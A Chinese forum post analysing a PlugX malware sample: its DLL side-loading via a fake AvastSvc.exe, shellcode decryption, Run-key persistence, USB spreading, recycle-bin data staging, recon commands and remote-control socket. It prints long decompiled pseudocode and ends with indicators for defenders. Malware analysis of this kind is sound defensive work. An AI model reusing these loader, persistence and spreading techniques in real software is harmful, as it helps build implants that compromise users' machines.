PlugX样本分析 - 〖系统安全〗

z3960

级别: 茶馆馆主

发帖: 770867

飞翔币: 207694

威望: 215657

飞扬币: 2511641

信誉值: 8

只看楼主更多操作 0 发表于: 2022-08-05

PlugX样本分析

本片文章对PlugX某样本行为进行分析。

样本信息

样本的基本信息

type	hash
SHA256:	00fbfaf36114d3ff9e2c43885341f1c02fade82b49d1cf451bc756d992c84b06
MD5:	c1c9624b21f71e4565b941a37db3815a
SHA1:	1c251974b2e6f110d96af5b23ad036954ba15e4e

解压样本发现样本文件夹内有三个文件，分别是AvastSvc.exe、wsc.dll、AvastAuth.dat。下面对文件逐个进行分析。

AvastSvc.exe

这是一个白文件，程序只有一个start函数，内容是导入wsc.dll，执行其run()函数。 复制代码 隐藏代码void __noreturn start(){  HMODULE v0; // eax@1  HMODULE v1; // esi@1  FARPROC v2; // edi@2  LPWSTR v3; // eax@3  DWORD v4; // edi@3  v0 = LoadLibraryW(L"wsc.dll");  v1 = v0;  if ( v0 )  {    v2 = GetProcAddress(v0, "_run@4");    if ( v2 )    {      v3 = GetCommandLineW();      v4 = ((int (__stdcall *)(_DWORD))v2)(v3);      FreeLibrary(v1);    }    else    {      v4 = GetLastError();      FreeLibrary(v1);    }  }  else  {    v4 = GetLastError();  }  ExitProcess(v4);}
可以看到样本为了躲避检测采取了白+黑的方式进行，这也是许多恶意软件用来躲避检测的常见方式。

wsc.dll

先对dll文件进行静态分析 复制代码 隐藏代码int sub_10001BF0(){  HMODULE v0; // eax@1  FARPROC v1; // eax@1  unsigned int i; // [sp+0h] [bp-1ACh]@5  char v4; // [sp+Bh] [bp-1A1h]@1  char v5; // [sp+Bh] [bp-1A1h]@3  char v6; // [sp+Bh] [bp-1A1h]@5  CHAR String2; // [sp+Ch] [bp-1A0h]@3  char v8; // [sp+Dh] [bp-19Fh]@3  int v9; // [sp+4Ch] [bp-160h]@3  _BYTE *v10; // [sp+50h] [bp-15Ch]@3  CHAR String1; // [sp+54h] [bp-158h]@1  char v12; // [sp+55h] [bp-157h]@1  int v13; // [sp+15Ch] [bp-50h]@3  unsigned int v14; // [sp+160h] [bp-4Ch]@5  char v15; // [sp+164h] [bp-48h]@1  char v16; // [sp+165h] [bp-47h]@1  char v17; // [sp+166h] [bp-46h]@1  char v18; // [sp+167h] [bp-45h]@1  char v19; // [sp+168h] [bp-44h]@1  char v20; // [sp+169h] [bp-43h]@1  char v21; // [sp+16Ah] [bp-42h]@1  char v22; // [sp+16Bh] [bp-41h]@1  char v23; // [sp+16Ch] [bp-40h]@1  char v24; // [sp+16Dh] [bp-3Fh]@1  char v25; // [sp+16Eh] [bp-3Eh]@1  CHAR ModuleName; // [sp+170h] [bp-3Ch]@1  char v27; // [sp+171h] [bp-3Bh]@1  char v28; // [sp+172h] [bp-3Ah]@1  char v29; // [sp+173h] [bp-39h]@1  char v30; // [sp+174h] [bp-38h]@1  char v31; // [sp+175h] [bp-37h]@1  char v32; // [sp+176h] [bp-36h]@1  char v33; // [sp+177h] [bp-35h]@1  char v34; // [sp+178h] [bp-34h]@1  char v35; // [sp+17Ch] [bp-30h]@3  int v36; // [sp+17Dh] [bp-2Fh]@3  int v37; // [sp+184h] [bp-28h]@5  int v38; // [sp+188h] [bp-24h]@1  int v39; // [sp+18Ch] [bp-20h]@3  CHAR ProcName; // [sp+190h] [bp-1Ch]@1  char v41; // [sp+191h] [bp-1Bh]@1  char v42; // [sp+192h] [bp-1Ah]@1  char v43; // [sp+193h] [bp-19h]@1  char v44; // [sp+194h] [bp-18h]@1  char v45; // [sp+195h] [bp-17h]@1  char v46; // [sp+196h] [bp-16h]@1  char v47; // [sp+197h] [bp-15h]@1  char v48; // [sp+198h] [bp-14h]@1  char v49; // [sp+199h] [bp-13h]@1  char v50; // [sp+19Ah] [bp-12h]@1  char v51; // [sp+19Bh] [bp-11h]@1  char v52; // [sp+19Ch] [bp-10h]@1  char v53; // [sp+19Dh] [bp-Fh]@1  char v54; // [sp+19Eh] [bp-Eh]@1  char v55; // [sp+19Fh] [bp-Dh]@1  char v56; // [sp+1A0h] [bp-Ch]@1  char v57; // [sp+1A1h] [bp-Bh]@1  char v58; // [sp+1A2h] [bp-Ah]@1  _BYTE *v59; // [sp+1A8h] [bp-4h]@1  v15 = '\';  v16 = 'A';  v17 = 'v';  v18 = 'a';  v19 = 's';  v20 = 't';  v21 = 'A';  v22 = 'u';  v23 = 't';  v24 = 'h';  v25 = '';  String1 = '';  sub_10002680(&v12, 0, 0x103u);  ModuleName = 'k';  v27 = 'e';  v28 = 'r';  v29 = 'n';  v30 = 'e';  v31 = 'l';  v32 = '3';  v33 = '2';  v34 = '';  v38 = 9;  ProcName = 'G';  v41 = 'e';  v42 = 't';  v43 = 'M';  v44 = 'o';  v45 = 'd';  v46 = 'u';  v47 = 'l';  v48 = 'e';  v49 = 'F';  v50 = 'i';  v51 = 'l';  v52 = 'e';  v53 = 'N';  v54 = 'a';  v55 = 'm';  v56 = 'e';  v57 = 'A';  v58 = '';  v0 = GetModuleHandleA(&ModuleName);  v1 = GetProcAddress(v0, &ProcName);  (v1)(0, &String1, 260);  v59 = sub_10002660(&String1, '\');           // 指向路径  v4 = -8;  if ( v59 )  {    *v59 = 0;    v4 = -113;  }  v35 = '.';  v36 = 'tad';  v38 = 5;  String2 = 0;  sub_10002680(&v8, 0, 0x3Fu);  v9 = sub_10002D40(&v15);  sub_10002C10(&String2, &v15, v9);  sub_10002AD0(&String2, &v35, 4u);             // AvastAuth.dat  lstrcatA(&String1, &String2);  v10 = 0;  v39 = 0;  v13 = 0;  sub_10001000(&String1, &v39, &v13);           // 打开文件并对文件进行读操作  v5 = (((((((-38 * ((-26 * (((v4 ^ 0xE5 | 0xF5) ^ 0x4C) >> 4) | 0xCE) + 76) - 34) & 0x6D) - 19) / 39 >> 6) & 0xC9) + 60) ^ 0xCF)     / 171     / 101     / 178     / 146     - 14;  if ( !v13 )  {    sub_10002A4D(0);    v5 &= 0x7Bu;  }  v37 = v39;  v14 = sub_10002D40(v39);  v13 = v13 - v14 - 1;  v39 += v14 + 1;  v10 = LocalAlloc(0x40u, v13 + 1);  v6 = (((4 * ((((v5 + 19) ^ 0xC4) >> 5) | 0xBA) & 0x34) - 61) >> 6) & 0xCD;// 自解密算法  for ( i = 0; i < v13; ++i )  {    v10 = *(i + v39);    v10 ^= *(v37 + i % v14);    v6 = (v6 ^ 0x3A) / 137;  }  return sub_100015D0(v10, v13);                // 获得读写权限}
函数sub_10001000对.dat文件进行读操作，读取的值作为中间值进行了自解密运算，保存到v10中，最后获取读写操作权限。
下面我们进行动态分析在v10下断点找到shellcode进行提取。这个时候eax保存的值就是shellcode生成的地址，edx存储的是shellcode的长度。二进制复制到010editor上保存文件可以得到shellcode

shellcode

下面对生成的dll行为进行分析，先找到入口函数DllMain()，比较容易的找到关键函数。 复制代码 隐藏代码int DllMain(){  int v0; // eax  int v2; // [esp+0h] [ebp-18h]  void *v3; // [esp+4h] [ebp-14h]  int v4; // [esp+8h] [ebp-10h]  void *v5; // [esp+Ch] [ebp-Ch]  int v6; // [esp+10h] [ebp-8h]  int v7; // [esp+14h] [ebp-4h] BYREF  unknown_libname_2();  v7 = 0;  v0 = exec_GetCommandLineW();                  // 当前进程命令行字符串  v6 = exec_CommandLineToArgvW(v0, &v7);  switch ( v7 )  {    case 1:      run_self();                               // 创建三个文件，并设置文件夹自启动      exec_ExitProcess(0);      break;    case 2:      v5 = sub_1000C3E0();      v4 = exec_CreateMutexW(0, 0, v5);         // 创建互斥体      if ( exec_GetLastError() == 0xB7 )        exec_ExitProcess(0);      if ( !exec_memcmp(*(v6 + 4), L"-net", 8) )// 第四个参数是-net执行下面操作      {        Reg_Network();                          // Control/Network写入注册表值        run_self();                             // 创建三个文件，并设置文件夹自启动        exec_ExitProcess(0);      }      sub_100153A0();                           // 提权、删除文件、获取计算机基本信息      sub_100019B0(0);                          // 套接字相关函数，相关注册表值      exec_CloseHandle(v4);      break;    case 3:      sub_10015400(*(v6 + 4));      v3 = sub_1000C3E0();      v2 = exec_CreateMutexW(0, 0, v3);         // 创建互斥体      if ( exec_GetLastError() != 0xB7 )      {        exec_CloseHandle(v2);        run_self();      }      exec_ExitProcess(0);      break;  }  unknown_libname_1();  return 0;}
函数经过分析后采取了比较易读的命名方式。下面对关键函数进行依次分析。
在上面的代码中，这个程序要获取当前进程的命令行字符串，使用switch来进行流程的执行。
v7 = 1时执行case 1操作

case1

run_self()函数

复制代码 隐藏代码int sub_100090E0(){  unsigned int v0; // eax  int len; // eax  int len_0; // eax  char v4[520]; // [esp+0h] [ebp-1D68h] BYREF  wchar_t Ext; // [esp+208h] [ebp-1B60h] BYREF  char v6[510]; // [esp+20Ah] [ebp-1B5Eh] BYREF  char v7[520]; // [esp+408h] [ebp-1960h] BYREF  wchar_t Filename; // [esp+610h] [ebp-1758h] BYREF  char v9[510]; // [esp+612h] [ebp-1756h] BYREF  WCHAR v10; // [esp+810h] [ebp-1558h] BYREF  char v11[518]; // [esp+812h] [ebp-1556h] BYREF  WCHAR v12; // [esp+A18h] [ebp-1350h] BYREF  char v13[518]; // [esp+A1Ah] [ebp-134Eh] BYREF  char v14[520]; // [esp+C20h] [ebp-1148h] BYREF  char v15[520]; // [esp+E28h] [ebp-F40h] BYREF  wchar_t Dir; // [esp+1030h] [ebp-D38h] BYREF  char v17[510]; // [esp+1032h] [ebp-D36h] BYREF  wchar_t FullPath; // [esp+1230h] [ebp-B38h] BYREF  char v19[518]; // [esp+1232h] [ebp-B36h] BYREF  WCHAR v20[260]; // [esp+1438h] [ebp-930h] BYREF  WCHAR v21; // [esp+1640h] [ebp-728h] BYREF  char v22[518]; // [esp+1642h] [ebp-726h] BYREF  char ppath[520]; // [esp+1848h] [ebp-520h] BYREF  _WORD v24[260]; // [esp+1A50h] [ebp-318h] BYREF  int v25[12]; // [esp+1C58h] [ebp-110h] BYREF  __int16 v26; // [esp+1C88h] [ebp-E0h]  HANDLE hObject; // [esp+1C9Ch] [ebp-CCh] BYREF  HANDLE v28; // [esp+1CA0h] [ebp-C8h]  __int16 v29[46]; // [esp+1CACh] [ebp-BCh] BYREF  __int16 v30[20]; // [esp+1D08h] [ebp-60h] BYREF  __int16 v31[16]; // [esp+1D30h] [ebp-38h] BYREF  WCHAR v32; // [esp+1D50h] [ebp-18h] BYREF  int v33; // [esp+1D52h] [ebp-16h]  __int16 v34; // [esp+1D56h] [ebp-12h]  wchar_t Drive; // [esp+1D58h] [ebp-10h] BYREF  int v36; // [esp+1D5Ah] [ebp-Eh]  int v37; // [esp+1D60h] [ebp-8h]  int pName; // [esp+1D64h] [ebp-4h]  v31[0] = '%';                                 // %userprofile%\  v31[1] = 'u';  v31[2] = 's';  v31[3] = 'e';  v31[4] = 'r';  v31[5] = 'p';  v31[6] = 'r';  v31[7] = 'o';  v31[8] = 'f';  v31[9] = 'i';  v31[10] = 'l';  v31[11] = 'e';  v31[12] = '%';  v31[13] = '\';  v31[14] = '';  v30[0] = '%';  v30[1] = 'a';                                 // %allusersprofile%\  v30[2] = 'l';                                 // C:程序数据  v30[3] = 'l';  v30[4] = 'u';  v30[5] = 's';  v30[6] = 'e';  v30[7] = 'r';  v30[8] = 's';  v30[9] = 'p';  v30[10] = 'r';  v30[11] = 'o';  v30[12] = 'f';  v30[13] = 'i';  v30[14] = 'l';  v30[15] = 'e';  v30[16] = '%';  v30[17] = '\';  v30[18] = '';  exec_lstrcpyW(v14, v31);  exec_lstrcpyW(v15, v30);  pName = sub_1000C320();  exec_lstrcatW(v14, pName);  exec_lstrcatW(v15, pName);  exec_lstrcatW(v14, L"\");  exec_lstrcatW(v15, L"\");  exec_ExpandEnvironmentStringsW(v15, v24, 520);  if ( exec_GetFileAttributesW(v24) == -1 && !exec_CreateDirectoryW(v24, 0) )// 创建目录    exec_ExpandEnvironmentStringsW(v14, v24, 520);  exec_lstrcpyW(ppath, v24);  exec_lstrcatW(ppath, L"AvastSvc.exe");  exec_lstrcpyW(v7, v24);  exec_lstrcatW(v7, L"wsc.dll");  exec_lstrcpyW(v4, v24);  exec_lstrcatW(v4, L"AvastAuth.dat");  Drive = 0;  v36 = 0;  Dir = 0;  memset(v17, 0, sizeof(v17));  Filename = 0;  memset(v9, 0, sizeof(v9));  Ext = 0;  memset(v6, 0, sizeof(v6));  v21 = 0;  memset(v22, 0, sizeof(v22));  FullPath = 0;  memset(v19, 0, sizeof(v19));  v10 = 0;  memset(v11, 0, sizeof(v11));  v12 = 0;  memset(v13, 0, sizeof(v13));  exec_GetModuleFileNameW(0, &FullPath, 520);  _wsplitpath_s(&FullPath, &Drive, 3u, &Dir, 0x100u, &Filename, 0x100u, &Ext, 0x100u);  wsprintfW(&v21, L"%s%s", &Drive, &Dir);  wsprintfW(&v10, L"%s%s", &v21, L"wsc.dll");  wsprintfW(&v12, L"%s%s", &v21, L"AvastAuth.dat");  sub_10007380(v24);  exec_SetFileAttributesW(v24, 2);  exec_SetFileAttributesW(v24, 2);  exec_CopyFileW(&FullPath, ppath, 0);          // 创建文件AvastSvc.exe、wsc.dll、AvastAuth.dat  exec_CopyFileW(&v10, v7, 0);  exec_CopyFileW(&v12, v4, 0);  v0 = exec_GetSystemTimeAsFileTime(0);         // 检索当前日期和时间  srand(v0);  v37 = rand() % 899 + 100;  wsprintfW(v20, L""%s" %d", ppath, v37);  v29[0] = 'S';  v29[1] = 'o';  v29[2] = 'f';  v29[3] = 't';  v29[4] = 'w';  v29[5] = 'a';  v29[6] = 'r';  v29[7] = 'e';  v29[8] = '\';  v29[9] = 'M';  v29[10] = 'i';  v29[11] = 'c';  v29[12] = 'r';  v29[13] = 'o';  v29[14] = 's';  v29[15] = 'o';  v29[16] = 'f';  v29[17] = 't';  v29[18] = '\';  v29[19] = 'W';  v29[20] = 'i';  v29[21] = 'n';  v29[22] = 'd';  v29[23] = 'o';  v29[24] = 'w';  v29[25] = 's';  v29[26] = '\';  v29[27] = 'C';  v29[28] = 'u';  v29[29] = 'r';  v29[30] = 'r';  v29[31] = 'e';  v29[32] = 'n';  v29[33] = 't';  v29[34] = 'V';  v29[35] = 'e';  v29[36] = 'r';  v29[37] = 's';  v29[38] = 'i';  v29[39] = 'o';  v29[40] = 'n';  v29[41] = '\';  v29[42] = 'R';  v29[43] = 'u';  v29[44] = 'n';  v29[45] = '';  len = exec_lstrlenW(v20);  exec_RegCreate_SetKeyExW(0x80000002, v29, pName, v20, 2 * len + 2, 1);// HKEY_CURRENT_USER 0x80000001/打开注册表项并为文件创建键值（自启动）  len_0 = exec_lstrlenW(v20);  exec_RegCreate_SetKeyExW(0x80000001, v29, pName, v20, 2 * len_0 + 2, 1);// HKEY_LOCAL_MACHINE          0x80000002  v32 = 0;  v33 = 0;  v34 = 0;  wsprintfW(&v32, L" %d", v37);  exec_lstrcatW(ppath, &v32);                   // 拼接路径  exec_memset(&hObject, 0, 'x10');  exec_memset(v25, 0, 0x44);  v25[0] = 0x44;  v25[11] = 'x01';  v26 = 1;  if ( exec_CreateProcessW(0, ppath, 0, 0, 0, 4, 0, 0, v25, &hObject) )// 为AvastSvc.exe创建进程  {    exec_ResumeThread(v28);    CloseHandle(hObject);    CloseHandle(v28);  }  return 0;}
这段代码先指向C:程序数据，创建一个文件夹，然后将三个程序wsc.dll、AvastSvc.exe、AvastAuth.dat复制到文件夹内。后对文件夹内的三个文件设置注册表的HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Run键值进行自启动设置，最后创建AvastSvc.exe进程。
执行case2操作流程：先创建一个互斥体，拿命令行第四个参数与“-net”字符串进行比较，不相同则执行Reg_Network()函数。而Reg_Network()函数功能是将注册表HKEY_LOCAL_MACHINE SYSTEM ControlSet001 Control NetworkVersion置1，后面同样执行run_self()，再往后执行sub_100153A0()函数。

case2

sub_100153A0()

复制代码 隐藏代码int sub_100153A0(){  int v1; // [esp+0h] [ebp-8h] BYREF  int v2; // [esp+4h] [ebp-4h]  sub_10015600();                               // 遍历进程,打开进程设置自启动  v1 = 0;  v2 = exec_CreateThread(0, 0, sub_10014E10, 0, 0, &v1);// 创建线程  if ( v2 )  {    exec_CloseHandle(v2);    v2 = 0;  }  return 0;}
其中sub_10015600()函数如下

sub_10015600()

复制代码 隐藏代码int sub_10015600(){  wchar_t v1[18]; // [esp+8h] [ebp-E4h] BYREF  wchar_t v2[16]; // [esp+2Ch] [ebp-C0h] BYREF  wchar_t v3[16]; // [esp+4Ch] [ebp-A0h] BYREF  wchar_t SubStr[16]; // [esp+6Ch] [ebp-80h] BYREF  wchar_t v5[16]; // [esp+8Ch] [ebp-60h] BYREF  wchar_t v6[14]; // [esp+ACh] [ebp-40h] BYREF  __int16 v7[18]; // [esp+C8h] [ebp-24h] BYREF  SubStr[0] = 'A';                              // AdobeHelper.exe  SubStr[1] = 'd';  SubStr[2] = 'o';  SubStr[3] = 'b';  SubStr[4] = 'e';  SubStr[5] = 'H';  SubStr[6] = 'e';  SubStr[7] = 'l';  SubStr[8] = 'p';  SubStr[9] = 'e';  SubStr[10] = 'r';  SubStr[11] = '.';  SubStr[12] = 'e';  SubStr[13] = 'x';  SubStr[14] = 'e';  SubStr[15] = '';  v1[0] = 'A';                                  // AdobeUpdates.exe  v1[1] = 'd';  v1[2] = 'o';  v1[3] = 'b';  v1[4] = 'e';  v1[5] = 'U';  v1[6] = 'p';  v1[7] = 'd';  v1[8] = 'a';  v1[9] = 't';  v1[10] = 'e';  v1[11] = 's';  v1[12] = '.';  v1[13] = 'e';  v1[14] = 'x';  v1[15] = 'e';  v1[16] = '';  v2[0] = 'A';  v2[1] = 'd';  v2[2] = 'o';  v2[3] = 'b';  v2[4] = 'e';  v2[5] = 'U';  v2[6] = 'p';  v2[7] = 'd';  v2[8] = 'a';  v2[9] = 't';  v2[10] = 'e';  v2[11] = '.';  v2[12] = 'e';  v2[13] = 'x';  v2[14] = 'e';  v2[15] = '';  v6[0] = 'A';  v6[1] = 'd';  v6[2] = 'o';  v6[3] = 'b';  v6[4] = 'e';  v6[5] = 'A';  v6[6] = 'R';  v6[7] = 'M';  v6[8] = '.';  v6[9] = 'e';  v6[10] = 'x';  v6[11] = 'e';  v6[12] = '';  v5[0] = 'A';  v5[1] = 'A';  v5[2] = 'M';  v5[3] = ' ';  v5[4] = 'U';  v5[5] = 'p';  v5[6] = 'd';  v5[7] = 'a';  v5[8] = 't';  v5[9] = 'e';  v5[10] = '.';  v5[11] = 'e';  v5[12] = 'x';  v5[13] = 'e';  v5[14] = '';  v3[0] = 'A';  v3[1] = 'A';  v3[2] = 'M';  v3[3] = ' ';  v3[4] = 'U';  v3[5] = 'p';  v3[6] = 'd';  v3[7] = 'a';  v3[8] = 't';  v3[9] = 'e';  v3[10] = 's';  v3[11] = '.';  v3[12] = 'e';  v3[13] = 'x';  v3[14] = 'e';  v3[15] = '';  v7[0] = 'S';                                  // SeDebugprivilege  v7[1] = 'e';  v7[2] = 'D';  v7[3] = 'e';  v7[4] = 'b';  v7[5] = 'u';  v7[6] = 'g';  v7[7] = 'P';  v7[8] = 'r';  v7[9] = 'i';  v7[10] = 'v';  v7[11] = 'i';  v7[12] = 'l';  v7[13] = 'e';  v7[14] = 'g';  v7[15] = 'e';  v7[16] = 0;  sub_100072B0(v7, 1);                          // 指定写相关的访问权的OpenProcess操作  sub_100133D0(SubStr);                         // 遍历进程找到AdobeHelper.exe,关闭进程。打开进程删除注册表项  sub_100133D0(v1);                             // AdobeUpdates.exe  sub_100133D0(v2);  sub_100133D0(v6);  sub_100133D0(v5);  sub_100133D0(v3);  return sub_100072B0(v7, 0);}
函数将AdobeHelper.exe、AdobeUpdates.exe、 AdobeUpdate.exe、AdobeARM.exe、AM Update.exe、AAM Updates.exe字符串传入sub_100133D0()函数，sub_100072B0()的功能是获得文件的写访问权。而sub_100133D0()的内容是关闭进程、遍历磁盘删除文件、删除启动项。
回到sub_100153A0()函数，后面创建了一个线程，为函数sub_10014E10()

sub_10014E10()

复制代码 隐藏代码void __stdcall sub_10014E10(int a1){  int v1; // eax  __int16 lpBuffer; // [esp+0h] [ebp-430h] BYREF  char v3[518]; // [esp+2h] [ebp-42Eh] BYREF  wchar_t pFilePath; // [esp+208h] [ebp-228h] BYREF  char v5[518]; // [esp+20Ah] [ebp-226h] BYREF  int v6; // [esp+410h] [ebp-20h]  int v7; // [esp+414h] [ebp-1Ch] BYREF  int v8; // [esp+418h] [ebp-18h] BYREF  wchar_t *v9; // [esp+41Ch] [ebp-14h]  int v10; // [esp+420h] [ebp-10h]  int v11; // [esp+424h] [ebp-Ch]  int v12; // [esp+428h] [ebp-8h]  __int16 *v13; // [esp+42Ch] [ebp-4h]  exec_SetErrorMode(1);  v10 = 0;  lpBuffer = 0;  memset(v3, 0, sizeof(v3));  pFilePath = 0;  memset(v5, 0, sizeof(v5));  v13 = 0;  while ( 1 )  {    exec_memset(&lpBuffer, 0, 8);    exec_GetLogicalDriveStringsW(520, &lpBuffer);// 用指定系统中有效驱动器的字符串填充缓冲区。    v13 = &lpBuffer;    v6 = 1;    while ( *v13 )                              // 驱动中的每个文件夹都复制自身    {      exec_memset(&pFilePath, 0, 8);      exec_lstrcpyW(&pFilePath, L"\\.\");    // 匹配所有驱动器文件      exec_lstrcatW(&pFilePath, v13);           // 所有驱动器      v9 = exec_wcsrchr(&pFilePath, '\');      *v9 = 0;      v10 = CreateFile_0(&pFilePath);           // 创建文件      if ( v10 == 1 )      {        v8 = 0;        v7 = 0;        v12 = exec_CreateThread(0, 0, sub_100151E0, &pFilePath, 0, &v8);// 创建线程  互斥体、超级隐藏文件        if ( v12 )        {          exec_CloseHandle(v12);          v12 = 0;        }        exec_Sleep(100);        v11 = exec_CreateThread(0, 0, sub_10015030, &pFilePath, 0, &v7);// 创建线程        if ( v11 )        {          exec_CloseHandle(v11);          v11 = 0;        }        exec_Sleep(1000);      }      v1 = exec_lstrlenW(v13);      v13 += v1 + 1;    }    exec_Sleep(30000);  }}
函数创建了两个线程，在创建线程之前函数对整个磁盘进行遍历，并打开磁盘，之后在打开的磁盘中创建两个线程sub_100151E0()与sub_10015030()

sub_100151E0()

复制代码 隐藏代码int __stdcall sub_100151E0(_WORD *a1){  WCHAR v2; // [esp+0h] [ebp-430h] BYREF  char v3[518]; // [esp+2h] [ebp-42Eh] BYREF  wchar_t SysId; // [esp+208h] [ebp-228h] BYREF  char v5[518]; // [esp+20Ah] [ebp-226h] BYREF  int v6; // [esp+410h] [ebp-20h]  wchar_t *v7; // [esp+414h] [ebp-1Ch]  int v8; // [esp+418h] [ebp-18h] BYREF  WCHAR pFileName; // [esp+41Ch] [ebp-14h] BYREF  int v10; // [esp+41Eh] [ebp-12h]  int v11; // [esp+422h] [ebp-Eh]  __int16 v12; // [esp+426h] [ebp-Ah]  _WORD *v13; // [esp+428h] [ebp-8h]  int v14; // [esp+42Ch] [ebp-4h]  exec_SetErrorMode(1);  v13 = a1;  pFileName = 0;  v10 = 0;  v11 = 0;  v12 = 0;  if ( *a1 == '\' && v13[1] == '\' )    wsprintfW(&pFileName, L"%c:\", v13[4]);  else    wsprintfW(&pFileName, L"%ws", v13);  v2 = 0;  memset(v3, 0, sizeof(v3));  SysId = 0;  memset(v5, 0, sizeof(v5));  exec_lstrcpyW(&SysId, &pFileName);  v7 = exec_wcsrchr(&SysId, ':');  *v7 = 0;  wsprintfW(&v2, L"USB_NOTIFY_INF_%ws", &SysId);  v14 = exec_CreateMutexW(0, 0, &v2);           // 为驱动创建互斥体  if ( exec_GetLastError() != 0xB7 )  {    v8 = 0;    v6 = exec_CreateThread(0, 0, sub_10013ED0, 0, 0, &v8);// 创建线程，设置隐藏文件注册表项    while ( sub_10015E00(&pFileName) != 2 )     // 查看网络连接。在驱动器中复制自身，并且创建伪装快捷方式文件.lnk   在回收站创建CEFHelper.exe文件      exec_Sleep(60000);  }  exec_ReleaseMutex(v14);  exec_CloseHandle(v14);  return 0;}
函数进入每个驱动器之后创建互斥体USB_NOTIFY_INF_然后创建线程，设置隐藏注册表项。在while内部的sub_10015E00()函数查看网络连接、在驱动器中复制自身，并且创建伪装快捷方式文件.lnk   在回收站创建CEFHelper.exe文件，最后释放互斥体。

sub_10015030()

复制代码 隐藏代码int __stdcall sub_10015030(_WORD *a1){  LPCWSTR v2; // [esp+0h] [ebp-428h] BYREF  DWORD v3; // [esp+4h] [ebp-424h]  DWORD v4; // [esp+8h] [ebp-420h]  wchar_t SysId; // [esp+208h] [ebp-220h] BYREF  char v6[518]; // [esp+20Ah] [ebp-21Eh] BYREF  wchar_t *v7; // [esp+410h] [ebp-18h]  WCHAR pFilePath; // [esp+414h] [ebp-14h] BYREF  int v9; // [esp+416h] [ebp-12h]  int v10; // [esp+41Ah] [ebp-Eh]  __int16 v11; // [esp+41Eh] [ebp-Ah]  _WORD *v12; // [esp+420h] [ebp-8h]  int v13; // [esp+424h] [ebp-4h]  exec_SetErrorMode(1);  v12 = a1;  pFilePath = 0;  v9 = 0;  v10 = 0;  v11 = 0;  if ( *a1 == '\' && v12[1] == '\' )    wsprintfW(&pFilePath, L"%c:\", v12[4]);  else    wsprintfW(&pFilePath, L"%ws", v12);  LOWORD(v2) = 0;  memset(&v2 + 2, 0, 0x206u);  SysId = 0;  memset(v6, 0, sizeof(v6));  exec_lstrcpyW(&SysId, &pFilePath);  v7 = exec_wcsrchr(&SysId, ':');  *v7 = 0;  wsprintfW(&v2, L"USB_NOTIFY_COP_%ws", &SysId);// 为驱动创建互斥锁  v13 = exec_CreateMutexW(0, 0, &v2);  if ( exec_GetLastError() == 0xB7 )  {    exec_ReleaseMutex(v13);    exec_CloseHandle(v13);    v13 = 0;    return 0;  }  if ( InternetCheckConnectionW_0(v2, v3, v4) ) // 检查网络连接https://www.microsoft.com  {    sub_10010600(&pFilePath);                   // 将指定文件base64加密传到垃圾桶  }  else  {    if ( !sub_10012E60() )                      // 设置Network注册表      return 0;    sub_10010BA0(&pFilePath);                   // 设置清空回收站注册表项，创建一个进程使用某些shell获取计算机的基本信息    sub_100123C0(&pFilePath);  }  exec_ReleaseMutex(v13);  exec_CloseHandle(v13);  return 0;}
同上，创建一个互斥锁，检查网络连接https://www.microsoft.com ，连接正常则将某些指定格式的文件进行base64加密并传入回收站中。后面设置Network的注册表为1，sub_10010BA0()函数设置清空回收站注册表项，创建一个进程使用某些shell获取计算机的基本信息（ipconfig /all  netstat -ano  arp -a   tasklist /v  systeminfo）并且将文件tc3lzLmluZm8放入回收站将tmp.bat删除，并且创建进程。
回到主函数,sub_100019B0是套接字相关函数，如下 复制代码 隐藏代码int __stdcall sub_100019B0(int a1){  __int16 v2[18]; // [esp+0h] [ebp-64h] BYREF  __int16 v3[16]; // [esp+24h] [ebp-40h] BYREF  int v4; // [esp+44h] [ebp-20h]  int v5; // [esp+48h] [ebp-1Ch]  int v6; // [esp+4Ch] [ebp-18h]  int v7; // [esp+50h] [ebp-14h]  int v8; // [esp+54h] [ebp-10h]  int v9; // [esp+58h] [ebp-Ch]  int v10; // [esp+5Ch] [ebp-8h]  char v11[4]; // [esp+60h] [ebp-4h] BYREF  sub_1000F960();  v2[0] = 'S';  v2[1] = 'e';  v2[2] = 'D';  v2[3] = 'e';  v2[4] = 'b';  v2[5] = 'u';  v2[6] = 'g';  v2[7] = 'P';  v2[8] = 'r';  v2[9] = 'i';  v2[10] = 'v';  v2[11] = 'i';  v2[12] = 'l';  v2[13] = 'e';  v2[14] = 'g';  v2[15] = 'e';  v2[16] = 0;  v10 = sub_100072B0(v2, 1);                    // 提权  v3[0] = 'S';                                  // SeTcbprivilege  v3[1] = 'e';  v3[2] = 'T';  v3[3] = 'c';  v3[4] = 'b';  v3[5] = 'P';  v3[6] = 'r';  v3[7] = 'i';  v3[8] = 'v';  v3[9] = 'i';  v3[10] = 'l';  v3[11] = 'e';  v3[12] = 'g';  v3[13] = 'e';  v3[14] = 0;  v9 = sub_100072B0(v3, 1);                     // 提权  v8 = sub_10009AE0();                          // 创建线程，设置注册表值，创建套接字  unknown_libname_3(v11);  v7 = sub_100164D0(v11);                       // 窗口  v6 = sub_100165A0(v11);                       // 消息  v5 = sub_100164A0(v11);                       // Destroy  sub_10001850(dword_10028CEC);  sub_1000A210();  sub_1000EE80();                               // WSACleanup  v4 = 0;  unknown_libname_4(v11);  return v4;}
函数先提升权限，后创建一个线程创建一个套接字实现连接操作，可以执行远程用户的命令来篡改受感染的计算机，之后创建一个注册表SoftwareCLASSESms-puPROXY。
执行case3如下

case3

实现发送消息、执行shell的open操作。并且执行run_self操作。

总结

样本的行为事件总结如下：

注册表项

AvastSvcPYT = "% ProgramData% AvastSvcPYT AvastSvc.exe" : HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Run

AvastSvcPYT = "% ProgramData% AvastSvcPYT AvastSvc.exe" : HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Run

HKEY_LOCAL_MACHINE SYSTEM ControlSet001 Control Network Version = 1

HKEY_CURRENT_USER System CurrentControlSet Control Network Version = 1

HKEY_LOCAL_MACHINE SOFTWARE Classes ms-pu CLSID = {645FF040-5081-101B-9F08-00AA002F954E}

互斥体

USB_NOTIFYCOP

USB_NOTIFYINF

创建文件/目录

% ProgramData% AvastSvcPYT

% ProgramData% AvastSvcPYT AvastSvc.exe

% ProgramData% AvastSvcPYT AvastAuth.dat

% ProgramData% AvastSvcPYT wsc.dll

删除的文件

它会删除在终止进程的文件夹中找到的所有文件。(未定位)
它删除终止进程的文件夹。(未定位)
它将以下文件放入 {Drive} RECYCLER.BIN：tmp.bat
c3lzLmluZm8
CEFHelper.exe
AvastAuth.dat
wsc.dll

创建进程

% ProgramData% AvastSvcPYT AvastSvc.exe

关闭进程

